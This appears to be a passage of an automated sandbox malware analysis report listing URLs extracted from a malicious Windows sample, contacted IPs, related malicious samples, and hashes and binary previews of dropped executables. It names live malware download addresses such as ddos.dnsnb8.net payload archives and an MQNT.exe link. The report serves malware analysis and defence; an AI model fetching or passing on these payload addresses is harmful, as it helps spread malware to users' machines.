                                http://www.scintilla.org/scite.rngSciTE.exe.1.drfalse
                                  high
                                  http://whois.pconline.com.cn/ipJson.jsp?json=true5vrRrFN56j.exefalse
                                    high
                                    https://club.vip.qq.com/api/aggregation?g_tk=content-type:5vrRrFN56j.exefalse
                                      high
                                      http://www.ibsensoftware.com/5vrRrFN56j.exefalse
                                        high
                                        http://www.activestate.comHolgerSciTE.exe.1.drfalse
                                          high
                                          https://cdid.c-ctrip.com/model-poc2/hhttps://ip.cn/api/index?ip=&type=0User-Agent:5vrRrFN56j.exefalse
                                            high
                                            https://www.uc.cn/ipIP:https://api.ip.sb/iphttps://ipinfo.io/jsonip5vrRrFN56j.exefalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.eyuyan.com5vrRrFN56j.exefalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://ip-api.com/json/?lang=zh-CN5vrRrFN56j.exefalse
                                              high
                                              http://ddos.dnsnb8.net:799/cj//k2.rarWIJSmB.exe, 00000001.00000002.2332812102.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000002.2332812102.0000000000F32000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.baanboard.comBrendonSciTE.exe.1.drfalse
                                                high
                                                http://q1.qlogo.cn/g?b=qq&nk=5vrRrFN56j.exefalse
                                                  high
                                                  https://www.smartsharesystems.com/SciTE.exe.1.drfalse
                                                    high
                                                    http://47.92.98.180:18081/myauth/web/getUserCount?skey=c0ecd8de-75e7-47a6-a22b-8adedbf78780&apikey=c5vrRrFN56j.exefalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.scintilla.orgSciTE.exe.1.drfalse
                                                      high
                                                      http://www.develop.comSciTE.exe.1.drfalse
                                                        high
                                                        https://ipinfo.io/json5vrRrFN56j.exefalse
                                                          high
                                                          http://www.spaceblue.comSciTE.exe.1.drfalse
                                                            high
                                                            http://www.baanboard.comSciTE.exe.1.drfalse
                                                              high
                                                              http://ddos.dnsnb8.net:799/cj//k2.rarDWIJSmB.exe, 00000001.00000002.2332812102.0000000000F05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              http://www.develop.comDeepakSciTE.exe.1.drfalse
                                                                high
                                                                http://47.92.98.180:88/MQNT/data.txt5vrRrFN56j.exe, update.exe.0.drfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.ip138.com5vrRrFN56j.exefalse
                                                                  high
                                                                  http://ddos.dnsnb8.net:799/cj//k2.rar?pWIJSmB.exe, 00000001.00000002.2333336401.000000000141A000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  http://ddos.dnsnb8.net:799/cj//k1.raryFWIJSmB.exe, 00000001.00000002.2332812102.0000000000E8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://api.ip.sb/ip5vrRrFN56j.exefalse
                                                                    high
                                                                    http://www.rftp.comJosiahSciTE.exe.1.drfalse
                                                                      high
                                                                      http://www.ip138.comUser-Agent:5vrRrFN56j.exefalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.activestate.comSciTE.exe.1.drfalse
                                                                        high
                                                                        https://ip.cn/api/index?ip=&type=05vrRrFN56j.exefalse
                                                                          high
                                                                          http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEWIJSmB.exe, 00000001.00000003.2065758471.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                            high
                                                                            http://ddos.dnsnb8.net:799/cj//k1.rarAcrobatWIJSmB.exe, 00000001.00000003.2074353030.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            http://ddos.dnsnb8.net:799/cj//k1.rarQWIJSmB.exe, 00000001.00000002.2332812102.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000003.2074065250.0000000000F05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            http://upx.sf.netAmcache.hve.1.drfalse
                                                                              high
                                                                              http://www.rftp.comSciTE.exe.1.drfalse
                                                                                high
                                                                                http://ddos.dnsnb8.net:799/cj//k1.rarDWIJSmB.exe, 00000001.00000003.2074065250.0000000000F05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                http://www.spaceblue.comMathiasSciTE.exe.1.drfalse
                                                                                  high
                                                                                  https://www.baidu.com5vrRrFN56j.exefalse
                                                                                    high
                                                                                    https://www.smartsharesystems.com/MortenSciTE.exe.1.drfalse
                                                                                      high
                                                                                      http://47.92.98.180:88/MQNT/GX_RZ.txtupdate.exe.0.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://club.vip.qq.com/api/aggregation?g_tk=5vrRrFN56j.exefalse
                                                                                        high
                                                                                        http://www.lua.orgSciTE.exe.1.drfalse
                                                                                          high
                                                                                          http://www.eyuyan.comservice5vrRrFN56j.exefalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://ddos.dnsnb8.net/WIJSmB.exe, 00000001.00000002.2332812102.0000000000F32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          https://cdid.c-ctrip.com/model-poc2/h5vrRrFN56j.exefalse
                                                                                            high
                                                                                            http://47.92.98.180:88/MQNT/MQNT.exe5vrRrFN56j.exefalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            https://www.uc.cn/ip5vrRrFN56j.exefalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://ddos.dnsnb8.net:799/cj//k1.rarcC:WIJSmB.exe, 00000001.00000003.2074065250.0000000000F16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            44.221.84.105
                                                                                            ddos.dnsnb8.netUnited States
                                                                                            14618AMAZON-AESUSfalse
                                                                                            103.235.47.188
                                                                                            www.wshifen.comHong Kong
                                                                                            55967BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdfalse
                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                            Analysis ID:1589499
                                                                                            Start date and time:2025-01-12 17:36:08 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 5m 24s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:10
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:5vrRrFN56j.exe
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:5ad1a67084ee167d59560fbaec7529fe.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.spre.troj.evad.winEXE@5/14@2/2
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            HCA Information:Failed
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 52.168.117.173, 40.126.31.71, 13.107.246.45, 4.175.87.197, 2.21.65.154
                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • VT rate limit hit for: 5vrRrFN56j.exe
                                                                                            TimeTypeDescription
                                                                                            00:37:04API Interceptor1x Sleep call for process: 5vrRrFN56j.exe modified
                                                                                            00:37:28API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            44.221.84.105SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • npukfztj.biz/brsjohajbqj
                                                                                            RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                            • jhvzpcfg.biz/lkvkqbtwklkptpvq
                                                                                            BXOZIGZEUa.exeGet hashmaliciousBdaejecBrowse
                                                                                            • ddos.dnsnb8.net:799/cj//k2.rar
                                                                                            BXOZIGZEUa.exeGet hashmaliciousBdaejecBrowse
                                                                                            • ddos.dnsnb8.net:799/cj//k2.rar
                                                                                            PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • bumxkqgxu.biz/vnlfrtbjm
                                                                                            ArjM1qx3hV.exeGet hashmaliciousBdaejecBrowse
                                                                                            • ddos.dnsnb8.net:799/cj//k1.rar
                                                                                            aRxo3E278B.exeGet hashmaliciousBdaejecBrowse
                                                                                            • ddos.dnsnb8.net:799/cj//k1.rar
                                                                                            yRc7UfFif9.exeGet hashmaliciousBdaejecBrowse
                                                                                            • ddos.dnsnb8.net:799/cj//k1.rar
                                                                                            gT6IitwToH.exeGet hashmaliciousBdaejecBrowse
                                                                                            • ddos.dnsnb8.net:799/cj//k1.rar
                                                                                            REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • saytjshyf.biz/xoqfqirqhp
                                                                                            103.235.47.188VIP-#U4f1a#U5458#U7248.exeGet hashmaliciousBlackMoonBrowse
                                                                                            • www.baidu.com/
                                                                                            Iifpj4i2kC.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.zruypj169g.top/md02/?oHH8=VZUPDXU8mXkToFn&0PG4QdD=KBMih/6UmjMCLIvQj8A+JVJ0ZduXlvkac/jrKRN7UGcA2YCWIWeuvW479UURmW6VwJBRFqK2PA==
                                                                                            3.exeGet hashmaliciousBlackMoon, XRedBrowse
                                                                                            • www.baidu.com/
                                                                                            CZyOWoN2hiszA6d.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.vicmvm649n.top/v15n/?Yn=UsBn8mn1PUl4czyMQZxenuqc6dPBc+Q3khu6MN2NNQj7YA4ug5lWpId+R/K0fD87Hm6v&mv=Y4QppplhSjwxWBd
                                                                                            f2.exeGet hashmaliciousBlackMoonBrowse
                                                                                            • www.baidu.com/
                                                                                            f1.exeGet hashmaliciousUnknownBrowse
                                                                                            • www.baidu.com/
                                                                                            SecuriteInfo.com.FileRepMalware.29184.31872.exeGet hashmaliciousUnknownBrowse
                                                                                            • www.baidu.com/
                                                                                            chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                            • www.baidu.com/
                                                                                            LisectAVT_2403002A_489.exeGet hashmaliciousUnknownBrowse
                                                                                            • www.baidu.com/
                                                                                            d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exeGet hashmaliciousBdaejecBrowse
                                                                                            • www.baidu.com/
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            www.wshifen.comhttp://m.escritoresunidos.com/Get hashmaliciousUnknownBrowse
                                                                                            • 103.235.47.188
                                                                                            https://www.xietaoz.com/Get hashmaliciousUnknownBrowse
                                                                                            • 103.235.47.188
                                                                                            http://wap.escritoresunidos.com/Get hashmaliciousUnknownBrowse
                                                                                            • 103.235.46.96
                                                                                            http://m.activeselfie.com/Get hashmaliciousUnknownBrowse
                                                                                            • 103.235.47.188
                                                                                            http://m.ccsurj.org/Get hashmaliciousUnknownBrowse
                                                                                            • 103.235.46.96
                                                                                            http://www.activeselfie.com/Get hashmaliciousUnknownBrowse
                                                                                            • 103.235.46.96
                                                                                            https://aqctslc.com/Get hashmaliciousUnknownBrowse
                                                                                            • 103.235.46.96
                                                                                            http://www.oinsurgente.com/Get hashmaliciousUnknownBrowse
                                                                                            • 103.235.47.188
                                                                                            wRhEMj1swo.exeGet hashmaliciousUnknownBrowse
                                                                                            • 103.235.47.188
                                                                                            wRhEMj1swo.exeGet hashmaliciousUnknownBrowse
                                                                                            • 103.235.46.96
                                                                                            ddos.dnsnb8.netBXOZIGZEUa.exeGet hashmaliciousBdaejecBrowse
                                                                                            • 44.221.84.105
                                                                                            BXOZIGZEUa.exeGet hashmaliciousBdaejecBrowse
                                                                                            • 44.221.84.105
                                                                                            ArjM1qx3hV.exeGet hashmaliciousBdaejecBrowse
                                                                                            • 44.221.84.105
                                                                                            aRxo3E278B.exeGet hashmaliciousBdaejecBrowse
                                                                                            • 44.221.84.105
                                                                                            yRc7UfFif9.exeGet hashmaliciousBdaejecBrowse
                                                                                            • 44.221.84.105
                                                                                            gT6IitwToH.exeGet hashmaliciousBdaejecBrowse
                                                                                            • 44.221.84.105
                                                                                            #U65b0#U7248#U7f51#U5173.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                                                                                            • 44.221.84.105
                                                                                            #U8865#U4e01#U6253#U5305.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                                                                                            • 44.221.84.105
                                                                                            #U65b0#U7248#U7f51#U5173Srv.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                                                                                            • 44.221.84.105
                                                                                            gE4NVCZDRk.exeGet hashmaliciousBdaejec, RunningRATBrowse
                                                                                            • 44.221.84.105
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            AMAZON-AESUSres.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                            • 44.201.61.229
                                                                                            res.mips.elfGet hashmaliciousUnknownBrowse
                                                                                            • 54.24.210.36
                                                                                            res.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                            • 54.175.16.42
                                                                                            res.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                            • 34.199.188.151
                                                                                            https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                            • 18.235.164.84
                                                                                            https://adopt0098.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                            • 52.6.240.60
                                                                                            http://tall-orchid-wolfsbane.glitch.me/home.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 34.233.109.53
                                                                                            https://darkened-chalk-system-noolrgfa.glitch.me/Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                            • 35.172.94.107
                                                                                            https://ali0gkhgh.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                            • 3.233.158.25
                                                                                            https://aollmail1-109855.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                            • 3.233.158.25
                                                                                            BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdhttp://m.escritoresunidos.com/Get hashmaliciousUnknownBrowse
                                                                                            • 103.235.47.188
                                                                                            https://www.xietaoz.com/Get hashmaliciousUnknownBrowse
                                                                                            • 103.235.46.96
                                                                                            http://wap.escritoresunidos.com/Get hashmaliciousUnknownBrowse
                                                                                            • 103.235.46.96
                                                                                            http://m.activeselfie.com/Get hashmaliciousUnknownBrowse
                                                                                            • 103.235.46.96
                                                                                            http://m.ccsurj.org/Get hashmaliciousUnknownBrowse
                                                                                            • 103.235.46.96
                                                                                            http://www.activeselfie.com/Get hashmaliciousUnknownBrowse
                                                                                            • 103.235.46.96
                                                                                            https://aqctslc.com/Get hashmaliciousUnknownBrowse
                                                                                            • 103.235.46.96
                                                                                            http://www.oinsurgente.com/Get hashmaliciousUnknownBrowse
                                                                                            • 103.235.47.188
                                                                                            wRhEMj1swo.exeGet hashmaliciousUnknownBrowse
                                                                                            • 103.235.47.188
                                                                                            wRhEMj1swo.exeGet hashmaliciousUnknownBrowse
                                                                                            • 103.235.46.96
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            a0e9f5d64349fb13191bc781f81f42e1rii2.mp3.htaGet hashmaliciousLummaCBrowse
                                                                                            • 103.235.47.188
                                                                                            installer_1.05_37.4.exeGet hashmaliciousLummaCBrowse
                                                                                            • 103.235.47.188
                                                                                            Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                            • 103.235.47.188
                                                                                            176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                            • 103.235.47.188
                                                                                            Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                            • 103.235.47.188
                                                                                            x.exeGet hashmaliciousLummaCBrowse
                                                                                            • 103.235.47.188
                                                                                            SDIO_R773.exeGet hashmaliciousLummaCBrowse
                                                                                            • 103.235.47.188
                                                                                            176.113.115.170_3.ps1Get hashmaliciousLummaCBrowse
                                                                                            • 103.235.47.188
                                                                                            4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                            • 103.235.47.188
                                                                                            5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 103.235.47.188
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            C:\Users\user\AppData\Local\Temp\WIJSmB.exeBXOZIGZEUa.exeGet hashmaliciousBdaejecBrowse
                                                                                              BXOZIGZEUa.exeGet hashmaliciousBdaejecBrowse
                                                                                                ArjM1qx3hV.exeGet hashmaliciousBdaejecBrowse
                                                                                                  aRxo3E278B.exeGet hashmaliciousBdaejecBrowse
                                                                                                    yRc7UfFif9.exeGet hashmaliciousBdaejecBrowse
                                                                                                      gT6IitwToH.exeGet hashmaliciousBdaejecBrowse
                                                                                                        #U65b0#U7248#U7f51#U5173.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                                                                                                          #U8865#U4e01#U6253#U5305.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                                                                                                            #U65b0#U7248#U7f51#U5173Srv.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                                                                                                              gE4NVCZDRk.exeGet hashmaliciousBdaejec, RunningRATBrowse
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\WIJSmB.exe
                                                                                                                File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):19456
                                                                                                                Entropy (8bit):6.5896419013560585
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:1F0S2XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:FSQGPL4vzZq2o9W7GsxBbPr
                                                                                                                MD5:13B828EAB878D1F9C988EDC4EBA7746D
                                                                                                                SHA1:976C706155D02408414E95B3575B9777BA37AF52
                                                                                                                SHA-256:2784B9088DB6A59ABC5DEF78E970FDED49EFC2E15DB51EFB5D97E9A6AEE5ACE2
                                                                                                                SHA-512:19965E45E0DC318751A915A2C7EEAC02D2CDE9FB78FCC0EB9A9EDCC3593B91A9C084DDA5C45ED21AEF4F83740E5CD8F29231C43E53A93D8F249FE71E658CB167
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Reputation:low
                                                                                                                Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\WIJSmB.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:modified
                                                                                                                Size (bytes):2389504
                                                                                                                Entropy (8bit):6.7313484903074645
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                                                                                                                MD5:BCE212A76EC549A2F6044296ED6319E8
                                                                                                                SHA1:E7E88140A7DBB4AB2B0DF7DCFBD2F88F3D001FB5
                                                                                                                SHA-256:C131C87F23AEA6ED01F7999D1FD650DF6BF294CAC8BA49C6EF8C1210E264D137
                                                                                                                SHA-512:F785E7B0DD7CFF7ADD62643AF9A873BA8014A4FA325BB9F70F531966A700BC53D8B17B32F91EDCFE8595B190402D4A81FD54CBF681D47A25C814A07F1918447B
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Reputation:low
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\WIJSmB.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):31744
                                                                                                                Entropy (8bit):6.366507935635089
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:uWQ3655Kv1X/qY1MSdYuQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdYVGCq2iW7z
                                                                                                                MD5:30A0AB4F8FF2EA61CF2536D65476E132
                                                                                                                SHA1:A45C3AB33858C2EE2F65FF998758DDD46DCF5CC9
                                                                                                                SHA-256:F016A559A0B67072B4FB197691901F52BD471166D5743566595027416233A0DE
                                                                                                                SHA-512:F2E18B4595D3CA1B3F92D247568A893F19AB19DEA87C732DBC2EAF90BBAF3F4D0DFC68CEA6DAE70EB9352211C2077EB082B5E885FAB9ED117824BAB9FF5E2BFF
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Reputation:low
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65536
                                                                                                                Entropy (8bit):0.9737859202651148
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:L0FNcNUu7sdhn/7afzQXIDcQAc6TcEIcw3E+HbHg/5ksS/YyNlIcIPkMhFqLOygE:QEUu7a0OXyRjE/JXzuiFpZ24IO8h
                                                                                                                MD5:11F6EA5EFC884D173E8B4776CD9AAF94
                                                                                                                SHA1:63826E343D1035BEE4213796858C27C866938ABF
                                                                                                                SHA-256:957533A9EBF63EE70AF948ADE481773A9A4D4E25B85EE90212EC43DA7ACE15FE
                                                                                                                SHA-512:EF2D1747F405A09095473926863D14C5ABCC00CC234622840851C3531F56B93142C44FC50F6253334C7347626B923850ECCA925E7689BAD829F3A21061C6D470
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.2.2.0.2.2.7.7.0.5.5.0.8.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.2.2.0.2.2.8.2.8.3.6.3.9.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.e.9.c.c.0.7.1.-.e.6.0.5.-.4.c.7.1.-.9.9.4.7.-.9.d.7.3.7.d.d.6.6.3.a.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.2.9.a.b.9.7.3.-.e.b.1.0.-.4.7.5.3.-.a.b.6.0.-.d.e.c.0.2.4.f.e.9.4.d.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.I.J.S.m.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.0.-.0.0.0.1.-.0.0.1.4.-.4.d.2.7.-.c.6.3.4.1.0.6.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.4.d.7.8.4.e.c.7.7.d.1.4.7.0.a.9.b.0.1.f.9.d.f.a.d.3.9.d.f.1.0.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.W.I.J.S.m.B...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Mini DuMP crash report, 15 streams, Mon Jan 13 05:37:07 2025, 0x1205a4 type
                                                                                                                Category:dropped
                                                                                                                Size (bytes):168636
                                                                                                                Entropy (8bit):1.7670896768470092
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:Nm9bLbwdx9xzBex2NRIlO9tgtO9Mz5KegIKtjbGUdHyms:cbf+x9xlex+2OfqIUQeDKh9xs
                                                                                                                MD5:EFB22BBF8625432F51C4D8805BA1E58C
                                                                                                                SHA1:8B9D724D864A741663DDC5B474D72696986A7C6F
                                                                                                                SHA-256:9F361F6109EAAFBBDE9466D07C9E0512D035B47D7FB6BC34F7D69244B12E17AE
                                                                                                                SHA-512:4FB9CB06C54D66A3A1745EE458093163CF4CA9738EA0C5620B20AC0750DB4AFC60E58C9942A1E2BE9350FDA652B023DAC600C9A6CA43271BADEF2BE1E448B477
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:MDMP..a..... ..........g....................................<.... ...........S..........`.......8...........T............=...U........... ..........."..............................................................................eJ......D#......GenuineIntel............T.......p.....g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8286
                                                                                                                Entropy (8bit):3.6989173450745705
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:R6l7wVeJGb6R6YXJ6lgmfmjpDH89bN7sfdvm:R6lXJq6R6Y56lgmfm+NAf4
                                                                                                                MD5:FF749F040E64695E7DBF792730BF526F
                                                                                                                SHA1:B4E38EE34E3359294A2802111178DF3A35016E49
                                                                                                                SHA-256:4F7546AF06342EB4315A968C329E9684E92C590EBCA3367B591BEF90C274EB99
                                                                                                                SHA-512:78C32115B58BA7E65E718B380E17EB5085DECEBCD24085EA57D6DBF3213ABDFF156DFA9C3EB5E850C58D1F2DC927FEB4A53FFDC09B3190A37B536C6B7024FA5A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
